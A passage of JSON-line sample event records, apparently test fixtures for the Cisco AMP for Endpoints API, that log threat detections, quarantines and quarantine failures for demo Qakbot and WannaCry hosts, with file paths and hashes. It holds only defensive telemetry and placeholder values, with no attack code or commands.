95ec8bc4ad6984758be42b152bd"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
